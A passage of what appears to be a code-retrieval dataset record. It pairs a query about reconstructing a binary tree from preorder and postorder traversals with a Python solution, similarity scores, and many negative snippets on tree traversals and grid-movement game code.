think a problem is that if all surrounding tiles are already clean, then, in that case,\n #you can get stuck in situation where you keep recalculating a new random direction, but when you take a step,\n #all the next tiles have already been cleaned, and you get stuck in a loop, so in this case, you must\n #not recalculate a new direction, but rather keep going in same direction until you find a tile not clean,\n #and jump to that tile instead, and go from there.\n #So find this case--see if that corrects this issue!\n \n keepTryingNewDirection = True\n while (keepTryingNewDirection == True):\n self.direction = random.randrange(0,359) #get new random direction\n newPos = self.position.getNewPosition(self.direction,self.speed) #get new next position step with new direc.\n newPosx = newPos.getX()\n newPosy = newPos.getY()\n newPosx = math.floor(newPosx)\n newPosy = math.floor(newPosy)\n if (self.room.isPositionInRoom(newPos)) and (self.room.isTileCleaned(newPosx,newPosy) == False):\n #new position in new direction is in room, and the tile has not been cleaned yet\n #so new direction and new tile to clean found!\n self.setRobotPosition(newPos)\n self.room.cleanTileAtPosition(newPos)\n #print \"Moved in NEW DIRECTION I was moving in last time, direction = \" + str(self.direction)\n keepTryingNewDirection = False\n elif (self.room.isPositionInRoom(newPos) == False):\n #new position in new direction NOT in room -- try again!\n #print \"new direction found a new position not in room --hit wall--try again! direction = \" + str(self.direction)\n continue\n else:\n #print \"new direction produced new position in room but tile already clean--try again?! direction = \" + str(self.direction)\n #print \"first check to see if all tiles have already been cleaned.\"\n #?? Any other checks needed here? list of tiles visited? is this really needed??\n #calculate list of cells not clean yet\n tilesCleaned = []\n allSurroundingTilesClean = False\n foundTileUnclean = False\n saveWidth = 0\n saveHeight = 0\n for i in range(0,self.room.width):\n for j in range(0,self.room.height):\n if (self.room.isTileCleaned(i,j) == False):\n saveWidth = i\n saveHeight = j\n foundTileUnclean = True\n else:\n #print \"appending to tiles cleaned: tile: i = \" + str(i) + \" j = \" + str(j)\n tilesCleaned.append((i,j)) #make list of tiles cleaned\n if (foundTileUnclean == True):\n #print \"not all tiles are clean!--start here rather than getting new direc. i = \" + str(saveWidth) + \" j = \" + str(saveHeight)\n newPos = Position(saveWidth,saveHeight)\n self.setRobotPosition(newPos)\n self.room.cleanTileAtPosition(newPos)\n #print \"Found new tile that was not clean! current direc. \" + str(self.direction)\n #print \"tile location x = \" + str(saveWidth) + \" y = \" + str(saveHeight)\n keepTryingNewDirection = False\n else:\n keepTryingNewDirection = False\n #print \"all tiles clean! stop cleaning!-- do not look for new direction! 
should be done.\"\n\n #for tile in tilesCleaned:\n #print tile", "def move(self, direction: str) -> int:\n # O(1) per move\n\n cur_pos = self.positions[-1]\n\n move = self.moves[direction]\n new_pos = cur_pos[0] + move[0], cur_pos[1] + move[1]\n\n if new_pos[0] == self.height or new_pos[0] == -1 or new_pos[1] == self.width or new_pos[1] == -1 or (new_pos in self.positions_set and new_pos != self.positions[0]):\n return -1\n\n self.positions.append(new_pos)\n self.positions_set.add(new_pos)\n\n if self.eaten < len(self.food) and new_pos == self.food[self.eaten]:\n self.eaten += 1\n else:\n tail = self.positions.popleft()\n\n if tail != self.positions[-1]:\n self.positions_set.remove(tail)\n\n return self.eaten", "def update_grid(self):\n if self.game_over:\n return\n if self.active_piece is None:\n self.place_new_piece()\n if self.piece_collision_exists(self.active_piece):\n self.handle_active_piece_collision()\n self.place_new_piece()\n self.shift_cells(self.active_piece, self.current_direction)\n self.active_piece = TransformPiece.shift_coordinates(self.active_piece, self.current_direction)\n self.merge_with_completed_rows()\n if self.is_game_won():\n self.game_over = True", "def get_move(self, board):\n while True:\n col = random.randint(0, board.width)\n row = board.try_move(col)\n\n if row >= 0:\n break\n\n return row, col", "def get_new_origin(self, direction=None):\n y, x = 1, 0\n direction_coords = {'origin': (0, 0), 'right': (0, 1), 'left': (0, -1)}\n if direction and direction in direction_coords:\n y, x = direction_coords[direction]\n return (self.origin[0] + y, self.origin[1] + x)", "def get_coord_in_direction(self, position, direction):\n x_r = position[x]\n y_r = position[y]\n if direction == NORTH:\n y_r = y_r + 1\n elif direction == NORTHEAST:\n x_r = x_r + 1\n y_r = y_r + 1\n elif direction == EAST:\n x_r = x_r + 1\n elif direction == SOUTHEAST:\n x_r = x_r + 1\n y_r = y_r - 1\n elif direction == SOUTH:\n y_r = y_r - 1\n elif direction == SOUTHWEST:\n x_r = x_r - 1\n y_r = y_r - 1\n elif direction == WEST:\n x_r = x_r - 1\n else: # direction == NORTHWEST\n x_r = x_r - 1\n y_r = y_r + 1\n\n return (x_r, y_r)" ]
[ "0.6662709", "0.6605978", "0.6600228", "0.6573474", "0.6549251", "0.65067387", "0.6477407", "0.6455114", "0.64177567", "0.6393052", "0.6361281", "0.6359388", "0.6349698", "0.63481045", "0.63376284", "0.63300747", "0.63202614", "0.6316886", "0.630494", "0.62923414", "0.62752783", "0.6271348", "0.6218553", "0.6210817", "0.62067926", "0.6187448", "0.61868685", "0.61863774", "0.61756545", "0.6156275", "0.61502284", "0.61461973", "0.6143296", "0.612764", "0.612045", "0.611599", "0.61076444", "0.6097747", "0.6092213", "0.60891056", "0.6075372", "0.60721976", "0.6063659", "0.6049777", "0.6035465", "0.6026365", "0.6021066", "0.5992026", "0.59900814", "0.59841377", "0.5975527", "0.5972637", "0.5972443", "0.59683204", "0.5964065", "0.59382653", "0.5927685", "0.5923138", "0.59209055", "0.5917509", "0.59152913", "0.5879647", "0.5876115", "0.5874654", "0.58743906", "0.5870701", "0.586861", "0.58641946", "0.58558655", "0.5855506", "0.58491296", "0.58451754", "0.5842654", "0.58423245", "0.58412987", "0.5825554", "0.58255476", "0.5820749", "0.58074075", "0.5806614", "0.5806031", "0.58045244", "0.5800808", "0.5799889", "0.57976466", "0.5791746", "0.5787598", "0.5787319", "0.5786486", "0.57844657", "0.57840824", "0.5782476", "0.57797563", "0.5777567", "0.57724035", "0.5771067", "0.57688737", "0.57672983", "0.57672256", "0.5766434" ]
0.7444775
0
Return any binary tree that matches the given preorder and postorder traversals. Values in the traversals pre and post are distinct positive integers.
def constructFromPrePost(self, pre, post):
    if not pre and not post:
        return None
    root = TreeNode(pre[0])
    if len(pre) == 1 and len(post) == 1:
        return root
    if pre[1] == post[-2]:
        lpre, lpost = pre[1:], post[:len(post) - 1]
        ltree = self.constructFromPrePost(lpre, lpost)
        root.left = ltree
    else:
        lpre = pre[1:pre.index(post[-2])]
        lpost = post[:post.index(pre[1]) + 1]
        rpre = pre[pre.index(post[-2]):]
        rpost = post[post.index(pre[1]) + 1:-1]
        ltree = self.constructFromPrePost(lpre, lpost)
        rtree = self.constructFromPrePost(rpre, rpost)
        root.left, root.right = ltree, rtree
    return root
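A minimal usage sketch for the document above. The TreeNode and Solution classes are assumptions from the usual LeetCode setting and are not part of this record; the sample traversals describe the tree 1 -> (2 -> 4, 5), (3 -> 6, 7).

# Hypothetical scaffolding (assumed, not from the record above).
class TreeNode:
    def __init__(self, val=0, left=None, right=None):
        self.val, self.left, self.right = val, left, right

class Solution:
    # Bind the module-level function defined above as a method, so the
    # self.constructFromPrePost(...) recursion resolves.
    constructFromPrePost = constructFromPrePost

root = Solution().constructFromPrePost([1, 2, 4, 5, 3, 6, 7], [4, 5, 2, 6, 7, 3, 1])
assert (root.val, root.left.val, root.right.val) == (1, 2, 3)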
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def buildTree(self, inorder: 'List[int]', postorder: 'List[int]') -> 'TreeNode':\n self.post_index = len(postorder) - 1\n dict = {}\n for i, num in enumerate(inorder):\n dict[num] = i\n \n def helper(in_left, in_right):\n if in_left > in_right:\n return None\n \n root_val = postorder[self.post_index]\n root = TreeNode(root_val)\n self.post_index -= 1\n if in_left < in_right:\n root.right = helper(dict[root_val] + 1, in_right)\n root.left = helper(in_left, dict[root_val] - 1)\n return root\n \n return helper(0, len(inorder) - 1)", "def build_tree(preorder, inorder):\n\n # Base case\n if preorder == [] or inorder == []:\n return\n\n root = preorder[0]\n\n # Breaks the lists by root, left side, and right side\n in_index = inorder.index(root)\n in_left = inorder[:in_index]\n in_right = inorder[in_index + 1:]\n pre_left = preorder[1 : len(in_left) + 1]\n pre_right = preorder[len(in_left) + 1 :]\n\n # Recursively creates smaller binary trees to make a big binary tree\n tree = BinaryTree(root)\n tree.set_left(build_tree(pre_left, in_left))\n tree.set_right(build_tree(pre_right, in_right))\n\n return tree", "def construct_binary_tree(preorder, inorder):\n if len(preorder) == 0 or preorder == None or inorder == None:\n return None\n\n val = preorder[0]\n root = BinaryTreeNode(val)\n\n if len(preorder) > 1:\n inorder_root_index = inorder.index(val)\n inorder_left_sub_tree = inorder[:inorder_root_index]\n inorder_right_sub_tree = inorder[inorder_root_index+1:]\n preorder_left_sub_tree = preorder[1:len(inorder_left_sub_tree)+1]\n preorder_right_sub_tree = preorder[len(inorder_left_sub_tree) + 1:]\n root.left = construct_binary_tree(preorder_left_sub_tree, inorder_left_sub_tree)\n root.right = construct_binary_tree(preorder_right_sub_tree, inorder_right_sub_tree)\n return root", "def test_bin_tree():\n n1 = BinTreeNode(1)\n n2 = BinTreeNode(2)\n n3 = BinTreeNode(3)\n n4 = BinTreeNode(4)\n n5 = BinTreeNode(5)\n n1.left = n2\n n1.right = n3\n n2.left = n4\n n3.right = n5\n t = BinTree(n1)\n print('pre order')\n preorder_trav(t.root)\n print('in order')\n inorder_trav(t.root)\n print('post order')\n postorder_trav(t.root)", "def Trees_preOrder_traversal():\n # Python2 ported to Python3 via 2to3-3.7\n # URL:https://www.hackerrank.com/challenges/tree-preorder-traversal/problem\n def preOrder(root):\n # inorder: left root right\n # preorder: root, left, right 5,3,1,4,7,6,8\n # postorder: left,right, root\n # 5\n # 3 7\n # 1 4 6 8\n out = []\n to_proccess = [root]\n while to_proccess:\n node = to_proccess.pop()\n out.append(node.info)\n for child in [node.right, node.left]:\n if child:\n to_proccess.append(child)\n print(\" \".join(map(str, out)))\n\n def preOrder_recursive(root):\n def _preOrder(node):\n out = []\n out.append(node.info)\n for child in [node.left, node.right]:\n if child:\n out.extend(_preOrder(child))\n return out\n print(\" \".join(map(str, _preOrder(root))))", "def postorderTraversal(self, root: TreeNode) -> List[int]:\n stack = []\n postorder = []\n stack.append(root)\n\n while stack:\n node = stack.pop()\n if not node: continue\n right = node.right\n left = node.left\n if not right and not left:\n postorder.append(node.val)\n else:\n node.left = None\n node.right = None\n stack.append(node)\n stack.append(right)\n stack.append(left)\n return postorder", "def postorder_traversal(tree):\n post = '' # Handles the spaces between the postorder traversal\n # in the string\n\n # To make sure the function doesn't move on if it doesn't have\n # a left child, so it doesn't add to string if it 
is None\n if tree.get_left() != None:\n post += postorder_traversal(tree.get_left()) + ' '\n\n # To make sure the function doesn't move on if it doesn't have\n # a right child, so it doesn't add to string if it is None\n if tree.get_right() != None:\n post += postorder_traversal(tree.get_right()) + ' '\n\n # Prints the current value (this is all recursed in postorder)\n post += str(tree.get_val())\n\n return post", "def build_tree_from_preorder(values): \r\n \r\n if len(values) == 0 or values[0] == None:\r\n return None\r\n root = TreeNode(values[0])\r\n if len(values) == 1:\r\n return root\r\n root.left = build_tree_from_preorder(values[1:((len(values)-1) // 2 + 1)])\r\n root.right = build_tree_from_preorder(values[((len(values)-1) // 2 + 1):]) \r\n if root.left != None:\r\n root.left.parent = root\r\n if root.right != None:\r\n root.right.parent = root\r\n \r\n return root", "def compute_pre_post_order_values(\n tree,\n parent_id=None,\n parent_preorder=1,\n):\n # if we don't get a parent_id, we infer it to be the top level node\n parent_id = parent_id or next(iter(tree))\n\n pre_post_parent = {\n parent_id: {\n \"preorder\": parent_preorder,\n }\n }\n\n child_postorder = None\n # sorted to make result deterministic\n children_ids = sorted(tree[parent_id].keys())\n for child_id in children_ids:\n # if child_postorder is set we know this is not the first child and can set preorder relative to previous child\n child_preorder = child_postorder + 1 if child_postorder else parent_preorder + 1\n\n pre_post_child = compute_pre_post_order_values(\n tree[parent_id],\n child_id, \n child_preorder)\n pre_post_parent.update(pre_post_child)\n child_postorder = pre_post_child[child_id][\"postorder\"]\n # if children, parent post order is one more than last child post order; if leafnode, then postorder is one more than preorder\n pre_post_parent[parent_id][\"postorder\"] = pre_post_child[child_id][\"postorder\"] + 1 if children_ids else parent_preorder + 1\n\n return pre_post_parent", "def postorder_iteratively(tree):\n visited = []\n path = [tree]\n result = []\n while len(path) > 0:\n t = path[-1]\n if t not in visited:\n if t.right:\n path = path + [t.right]\n if t.left:\n path = path + [t.left]\n visited.append(t)\n else:\n path.pop()\n result.append(t.data)\n\n return result", "def postorder(root):\n if not root:\n print(\"Tree is Empty.\")\n return\n stack = []\n node = root\n visited = set()\n while stack or node:\n if node:\n stack.append(node)\n node = node.left\n\n else:\n node = stack.pop()\n if node.right and not (node.right in visited):\n stack.append(node)\n node = node.right\n else:\n visited.add(node)\n print(node.data, end=\" \")\n node = None\n print()", "def postorder(root):\n if not root:\n return\n inorder(root.left)\n inorder(root.right)\n print(root.data, end=' ')", "def post_order_nodes(root):\n if root.get_left():\n for node in post_order_nodes(root.get_left()):\n yield node\n\n if root.get_right():\n for node in post_order_nodes(root.get_right()):\n yield node\n\n yield root", "def reconstruct_preorder(preorder):\n\tdef reconstruct_preorder_helper(preorder_iter):\n\t\tsubtree_key = next(preorder_iter, None)\n\t\tif subtree_key is None:\n\t\t\treturn None\n\t\treturn BinaryTreeNode(\n\t\t\tsubtree_key,\n\t\t\treconstruct_preorder_helper(preorder_iter),\n\t\t\treconstruct_preorder_helper(preorder_iter))\n\treturn reconstruct_preorder_helper(iter(preorder))", "def postorder_iterative(root):\n if root is None:\n return\n \n stack1 = []\n stack2 = []\n stack1.append(root)\n \n 
while len(stack1):\n node = stack1.pop()\n stack2.append(node)\n \n if node.left:\n stack1.append(node.left)\n if node.right:\n stack1.append(node.right)\n \n while len(stack2):\n node = stack2.pop()\n print(node.data, end=\" \")", "def post_order(self):\n def walk(root):\n\n if root.left:\n walk(root.left)\n\n if root.right:\n walk(root.right)\n\n self.post_values.append(root.value)\n \n walk(self.root)\n return self.post_values", "def postorder(root: Node):\n return postorder(root.left) + postorder(root.right) + [root.data] if root else []", "def test_post_order_0_2(bst_all_to_left):\n assert tuple(bst_all_to_left.post_order()) == (1, 3, 2, 5, 4)", "def pre_order(self):\n def walk(root):\n self.pre_values.append(root.value)\n\n if root.left:\n walk(root.left)\n \n if root.right:\n walk(root.right)\n \n walk(self.root)\n return self.pre_values", "def postorder(self):\n\n traversal = []\n self.postorder_helper(self.root, traversal)\n return traversal", "def test_post_order_traversal(our_bsts):\n bpost = []\n for i in our_bsts[0].post_order():\n bpost.append(i)\n assert bpost == our_bsts[6]", "def binary_search_tree_run():\n\n # no need for Tree object as the Tree itself is a concept; its made of connected nodes\n # nodes are the object; connections are self contained\n\n def binary_insert(root, node):\n if root is None:\n root = node\n else:\n if root.data > node.data:\n if root.l_child is None:\n root.l_child = node\n else:\n binary_insert(root.l_child, node)\n else:\n if root.r_child is None:\n root.r_child = node\n else:\n binary_insert(root.r_child, node)\n\n def in_order_print(root):\n if not root:\n return\n in_order_print(root.l_child)\n print(root.data)\n in_order_print(root.r_child)", "def create_BinaryTree(inor, preor, inStart, inEnd):\n if inStart > inEnd:\n return\n temp = BinaryTreeNode(preor[create_BinaryTree.index])\n create_BinaryTree.index += 1\n\n if inStart == inEnd:\n return temp\n\n for i in range(inStart, inEnd + 1):\n if inor[i] == temp.data:\n index = i\n\n temp.left = create_BinaryTree(inor, preor, inStart, index - 1)\n temp.right = create_BinaryTree(inor, preor, index + 1, inEnd)\n return temp", "def preorder(root: Node):\n return [root.data] + preorder(root.left) + preorder(root.right) if root else []", "def branches(tree):\n return tree[1:]", "def generate_tree_postorder(node_lst, root_index):", "def post_order(self):\n try:\n if not self.root:\n return \"the tree is empty!\"\n else:\n output = []\n\n def order_tree(node):\n if node.left:\n order_tree(node.left)\n if node.right:\n order_tree(node.right)\n nonlocal output\n output += [node.value]\n return output\n final_out = order_tree(self.root)\n return final_out\n except:\n print(\"something went wrong please try again\")", "def branches(tree):\n\n return tree[1:]", "def preorder(node, pred, succ, res):\n if node is None:\n return res\n res = min(res, node.val - pred)\n res = min(res, succ - node.val)\n res = preorder(node.left, pred, node.val, res)\n res = preorder(node.right, node.val, succ, res)\n return res", "def preorder(root):\n if not root:\n return\n print(root.data, end=' ')\n inorder(root.left)\n inorder(root.right)", "def _post_order_helper(node_lst: List[ReadNode],\n root_index: int, flag: bool = True,\n right_index: int = 0) -> HuffmanTree:\n # if internal node\n if node_lst[root_index].l_type == 1 and flag:\n\n # Making Tree\n tree = HuffmanTree(None)\n\n tree.number = root_index - 1 - right_index\n\n # Creating Left and Right Trees\n tree.right = _post_order_helper(node_lst, tree.number, 
False)\n\n right_index = _find_height(tree.right)\n\n if right_index is None:\n right_index = 0\n else:\n right_index = len(right_index)\n\n tree.left = _post_order_helper(\n node_lst, tree.number, True, right_index)\n\n return tree\n\n elif node_lst[root_index].r_type == 1 and not flag:\n # Making Tree\n tree = HuffmanTree(None)\n tree.number = root_index - 1\n\n # Creating Left and Right Trees\n tree.right = _post_order_helper(node_lst, tree.number, False)\n\n right_index = _find_height(tree.right)\n\n if right_index is None:\n right_index = 0\n else:\n right_index = len(right_index)\n\n tree.left = _post_order_helper(\n node_lst, tree.number, True, right_index)\n\n return tree\n\n elif node_lst[root_index].l_type == 0 and flag:\n return HuffmanTree(node_lst[root_index].l_data)\n\n elif node_lst[root_index].r_type == 0 and not flag:\n return HuffmanTree(node_lst[root_index].r_data)\n\n return HuffmanTree(None)", "def postorder(self):\n return (node for node in self.get_postorder(self.root))", "def _minlex_postorder_traversal(self, root):\n\n # We compute a dictionary mapping from internal node ID to min leaf ID\n # under the node, using a first postorder traversal\n min_leaf = {}\n for u in self.nodes(root, order=\"postorder\"):\n if self.is_leaf(u):\n min_leaf[u] = u\n else:\n min_leaf[u] = min(min_leaf[v] for v in self.children(u))\n\n stack = []\n\n def push(nodes):\n stack.extend(sorted(nodes, key=lambda u: min_leaf[u], reverse=True))\n\n # The postorder traversal isn't robust to using virtual_root directly\n # as a node because we depend on tree.parent() returning the last\n # node we visiting on the path from \"root\". So, we treat this as a\n # special case.\n is_virtual_root = root == self.virtual_root\n roots = self.roots if root == -1 or is_virtual_root else [root]\n\n push(roots)\n parent = NULL\n while len(stack) > 0:\n v = stack[-1]\n children = [] if v == parent else self.children(v)\n if len(children) > 0:\n # The first time visiting a node, we push onto the stack its children\n # in order of reverse min leaf ID under each child. 
This guarantees\n # that the earlier children visited have smaller min leaf ID,\n # which is equivalent to the minlex condition.\n push(children)\n else:\n # The second time visiting a node, we pop and yield it, and\n # we update the parent variable\n parent = self.get_parent(v)\n yield stack.pop()\n if is_virtual_root:\n yield self.virtual_root", "def post_order_traversal(self) -> Queue:\n # initialize Queue\n q = Queue()\n\n #BST == empty\n if self.root is None:\n return q\n\n #recursive helper function return new Queue\n self.post_order_helper(self.root, q)\n return q", "def post_order(self):\n if self.left is not None:\n for i in self.left.post_order():\n yield i\n if self.right is not None:\n for i in self.right.post_order():\n yield i\n if self.val is not None:\n yield self.val", "def deserialize(self, data):\n post_order = [int(each) for each in data.split(' ') if data]\n print(post_order)\n\n def helper(lower=float('-inf'), upper=float('inf')):\n if not post_order or post_order[-1] < lower or post_order[-1] > upper:\n return None\n val = post_order.pop()\n root = TreeNode(val)\n root.right = helper(val, upper)\n root.left = helper(lower, val)\n\n return root\n\n r = helper()\n return r", "def post_order_traversal(self) -> Queue:\n q = Queue() # Initializing queue\n if self.root is None: # If tree is empty\n return q\n\n self.post_order_helper(self.root, q) # Using helper function if tree isn't empty and returning Queue\n return q", "def postorder_helper(succ, root, explored, out):\n if root in explored:\n return\n explored.add(root)\n\n for s in succ[root]:\n postorder_helper(succ, s, explored, out)\n out.append(root)", "def test_pre_order_0_2(bst_all_to_left):\n assert tuple(bst_all_to_left.pre_order()) == (4, 2, 1, 3, 5)", "def traverse_postorder(self, root):\n if root is not None:\n self.traverse_postorder(root.left)\n self.traverse_postorder(root.right)\n print(root.data)", "def postorder_traverse(self):\n\n keys = []\n\n if not self.node:\n return keys\n \n keys.extend(self.node.left.postorder_traverse())\n keys.extend(self.node.right.postorder_traverse())\n keys.append(self.node.vp.index)\n\n return keys", "def pre_order_nodes(root):\n yield root\n\n if root.get_left():\n for node in pre_order_nodes(root.get_left()):\n yield node\n\n if root.get_right():\n for node in pre_order_nodes(root.get_right()):\n yield node", "def postorder_recursive(node):\n if node is None:\n return\n \n postorder_recursive(node.left)\n postorder_recursive(node.right)\n print(node.data, end=\" \")", "def test_pre_order_traversal(our_bsts):\n bpo = []\n for i in our_bsts[0].pre_order():\n bpo.append(i)\n assert bpo == our_bsts[4]", "def post_order_traversal(self, root):\n\n def postorder_traversal_helper(root):\n if root:\n postorder_traversal_helper(root.left)\n postorder_traversal_helper(root.right)\n result.append(root.data)\n\n result = []\n postorder_traversal_helper(root)\n return result", "def preorder(self):\n\n traversal = []\n self.preorder_helper(self.root, traversal)\n return traversal", "def postorder(self,root)->list:\n\t\tres=[]\n\t\tif root:\n\t\t\tres=self.postorder(root.left)\n\t\t\tres=res+self.postorder(root.right)\n\t\t\tres.append(root.data)\n\t\treturn res", "def post_tree(user, root):\n\n # Get all posts that belong to post root.\n query = Post.objects.valid_posts(u=user, root=root).exclude(pk=root.id)\n\n # Filter spam/deleted comments or answers.\n if user.is_anonymous or not user.profile.is_moderator:\n query = query.exclude(Q(status=Post.DELETED) | Q(spam=Post.SPAM))\n\n 
query = query.select_related(\"lastedit_user__profile\", \"author__profile\", \"root__author__profile\")\n\n # Apply the sort order to all posts in thread.\n thread = query.order_by(\"type\", \"-accept_count\", \"-vote_count\", \"creation_date\")\n\n # Gather votes by the current user.\n votes = get_votes(user=user, root=root)\n\n # Shortcuts to each storage.\n bookmarks, upvotes = votes[Vote.BOOKMARK], votes[Vote.UP]\n\n # Build comments tree.\n comment_tree = dict()\n\n def decorate(post):\n # Mutates the elements! Not worth creating copies.\n if post.is_comment:\n comment_tree.setdefault(post.parent_id, []).append(post)\n post.has_bookmark = int(post.id in bookmarks)\n post.has_upvote = int(post.id in upvotes)\n if user.is_authenticated:\n post.can_accept = not post.is_toplevel and (user == post.root.author or user.profile.is_moderator)\n post.can_moderate = user.profile.is_moderator\n post.is_editable = (user == post.author or user.profile.is_moderator)\n else:\n post.can_accept = False\n post.is_editable = False\n post.can_moderate = False\n\n return post\n\n # Decorate the objects for easier access\n thread = list(map(decorate, thread))\n\n # Decorate the root post\n root = decorate(root)\n\n # Select the answers from the thread.\n answers = [p for p in thread if p.type == Post.ANSWER]\n\n return root, comment_tree, answers, thread", "def recoverTree(self, root: TreeNode) -> None:\n firstNode = None\n secondNode = None\n pre = TreeNode(float(\"-inf\"))\n\n stack = []\n p = root\n while p or stack:\n while p:\n stack.append(p)\n p = p.left\n p = stack.pop()\n\n if not firstNode and pre.val > p.val:\n firstNode = pre\n if firstNode and pre.val > p.val:\n # print(firstNode.val,pre.val, p.val)\n secondNode = p\n pre = p\n p = p.right\n firstNode.val, secondNode.val = secondNode.val, firstNode.val", "def pre_order_traversal(self):\n\n elements = []\n\n ##visit base node\n elements.append(self.data)\n\n ##visit left tree\n if self.left:\n elements += self.left.pre_order_traversal()\n\n #visit right tree\n if self.right:\n elements += self.right.pre_order_traversal()\n\n return elements", "def generate_tree_postorder(node_lst: List[ReadNode],\n root_index: int) -> HuffmanTree:\n\n tree = HuffmanTree(None)\n tree.right = _post_order_helper(node_lst, root_index, False)\n\n right_index = _find_height(tree.right)\n\n if right_index is None:\n right_index = 0\n else:\n right_index = len(right_index)\n\n tree.left = _post_order_helper(node_lst, root_index, True, right_index)\n\n _post_order_set_none(tree)\n\n return tree", "def test_binarytree_post_order_on_given(given_list, capsys):\n expected = [11, 14, 12, 19, 18, 22, 33, 31, 40, 20]\n given_list.post_order()\n out, err = capsys.readouterr()\n actual = [int(i) for i in out.split('\\n') if i != '']\n assert expected == actual", "def in_order_recursive(tree, vertex, keys):\n if vertex == -1:\n return True\n result = in_order_recursive(tree, tree[vertex][1], keys)\n # If the previous result is False, then the check is completed.\n # If the value of the last key in the list is greater than the current one,\n # then it is not bst, return False.\n # If the vertex has a left child and the key values ​​are equal,\n # then it is also not bst, return False.\n if not result or (keys and (keys[-1] > tree[vertex][0])) or (\n tree[vertex][1] != -1 and tree[tree[vertex][1]][0] == tree[vertex][0]\n ):\n return False\n keys.append(tree[vertex][0])\n result = in_order_recursive(tree, tree[vertex][2], keys)\n return result", "def preorder(self):\n return (node 
for node in self.get_preorder(self.root))", "def get_predeccessor(self, root):\n # Take a right traversal and go left\n # As much as you can. Last node will be successor\n root = root.left\n while root.right:\n root = root.right\n return root", "def fetchNodes(tree):\n if tree.results is None: #Check if the node is a branch\n condItems = {} #Initialize a container for the node conditions from lower branches\n v = [\"true\", \"false\"] #\"Veracity values\"\n for branch, veracity in [(tree.tb, v[0]), (tree.fb, v[1])]: #iterate over this node's true and false child nodes\n lower_results = fetchNodes(branch)\n if len(lower_results) == 1: #Check if child node is actually a leaf. If so,\n lower_results.insert(0, (tree.col, tree.value, veracity))\n condItems[veracity] = [lower_results] #Initialize the condition needed to reach that leaf\n else:\n condItems[veracity] = [] #If the child is not a leaf, initialize an empty list to contain its updated conditions\n for item in lower_results: #Iterate over each set of node conditions that stem from this branch\n new_descriptor = deepcopy(item) #make a deep copy of the list of node conditions from the lower level nodes\n #insert this node's condition at the beginning of each of the node conditions from the lower levels\n new_descriptor.insert(0, (tree.col, tree.value, veracity)) \n condItems[veracity].append(new_descriptor) #append the updated set of node conditions to the branches items\n node_conditions = deepcopy(condItems[v[0]]) #Initialize the complete list of node conditions that stem from this node\n node_conditions.extend(deepcopy(condItems[v[1]])) #Add the node conditions from the second branch of this node\n return node_conditions #Send the full set of node conditions from this node up to the higher nodes.\n else: #If the node is a leaf, return the dictionary of results\n return [tree.results]", "def postorder_recursive(root):\n if root:\n postorder_recursive(root.left)\n postorder_recursive(root.right)\n print(root.data, end=\" \")", "def post_order(self):\n stack = []\n node = self\n last = None\n while stack or node:\n if node:\n stack.append(node)\n node = node.left\n else:\n peek = stack[-1]\n if peek.right is not None and last != peek.right:\n node = peek.right\n else:\n yield peek.val\n last = stack.pop()\n node = None", "def walk_tree(tree,\n leaf_func=lambda x: None,\n pre_nonleaf_func=lambda x: None,\n post_nonleaf_func=lambda x: None):\n tree = deepcopy(tree)\n\n def walk(node):\n # Depth First Traversal of an NLTK Tree.\n if is_leaf_node(node):\n leaf_func(node)\n else:\n pre_nonleaf_func(node)\n if len(node) > 0:\n for child in node:\n walk(child)\n post_nonleaf_func(node)\n\n walk(tree)\n return tree", "def pre_order_traversal(self) -> Queue:\n # initialize\n q = Queue()\n\n #binary search tree == empty\n if self.root is None:\n return q\n\n #recursive helper return Queue\n self.pre_order_helper(self.root, q)\n return q", "def preorderTraversal(self, root: TreeNode) -> List[int]:\n def preorder(root,seq):\n if root is None:\n return seq\n seq.append(root.val)\n preorder(root.left,seq)\n preorder(root.right,seq)\n return seq\n \n prelist= []\n return preorder(root,prelist)", "def binarizetree(tree):\n queue = [tree]\n while queue:\n node = queue.pop(0)\n queue += node.nodelist\n # Construct binary tree\n if len(node.nodelist) == 2:\n node.lnode = node.nodelist[0]\n node.rnode = node.nodelist[1]\n # Parent node\n node.lnode.pnode = node\n node.rnode.pnode = node\n elif len(node.nodelist) > 2:\n # Remove one node from the nodelist\n 
node.lnode = node.nodelist.pop(0)\n newnode = SpanNode(node.nodelist[0].prop)\n newnode.nodelist += node.nodelist\n # Right-branching\n node.rnode = newnode\n # Parent node\n node.lnode.pnode = node\n node.rnode.pnode = node\n # Add to the head of the queue\n # So the code will keep branching\n # until the nodelist size is 2\n queue.insert(0, newnode)\n # Clear nodelist for the current node\n node.nodelist = []\n return tree", "def postorder(self):\n if not self.is_empty():\n for p in self._subtree_postorder(self.root()): # start recursion\n yield p", "def preorder(root):\n if not root:\n print(\"Tree is Empty\")\n return\n stack = []\n stack.append(root)\n while stack:\n node = stack.pop()\n print(node.data, end=\" \")\n if node.right:\n stack.append(node.right)\n if node.left:\n stack.append(node.left)\n print()", "def question4(T,r,n1,n2):\n\n\tif(len(T)<=1):\t\t\t\t\t\t\t\t# Edge case : If the Tree only consists of a root and no children\n\t\treturn -1\n\n\tif(n1==None or n2==None):\t\t\t\t\t# Edge case : If n1 and n2 are not actually numbers\n\t\treturn -1\n\n\tlen_T = len(T)\n\tif(not n1 < len_T or not n2 < len_T):\t\t# Edge case : If the nodes gives in parameters do not actually exist in the tree\n\t\treturn -1\n\n\tn1_list = []\t\t\t\t\t\t\n\tn2_list = []\n\n\tfor i in range(len(T)):\t\t\t\t\t\t# Traverse the list and append all the parents of node1 if found in O(N)\n\t\tif T[i][n1]==1:\n\t\t\tn1_list.append(i)\n\n\tfor i in range(len(T)):\t\t\t\t\t\t# Traverse the list and append all the parents of node2 is found in O(N)\n\t\tif T[i][n2]:\n\t\t\tn2_list.append(i)\n\n\t\t\t\t\t\t\t\t\t\t\t\t# The root is a common ancestor of every node in the tree\n\tif not r in n1_list:\t\t\t\t\t\t# check if the root is in the list, if not, add it\n\t\tn1_list.append(r)\n\n\tif not r in n2_list:\t\t\t\t\t\t# check if the root is in the list, if not, add it\n\t\tn2_list.append(r)\n\n\tn1_list = reversed(n1_list)\t\t\t\t\t# Since we are operating on a binary tree, we sort\n\tfor i in n1_list:\t\t\t\t\t\t\t# in decending order to operate on the latest nodes\n\t\tif i in n2_list:\t\t\t\t\t\t# if a match is found, we know that it is the lowest common ancestor\n\t\t\treturn i \t\t\t\t\t\t\t# If nothing is found, the root node is bound to be returned. 
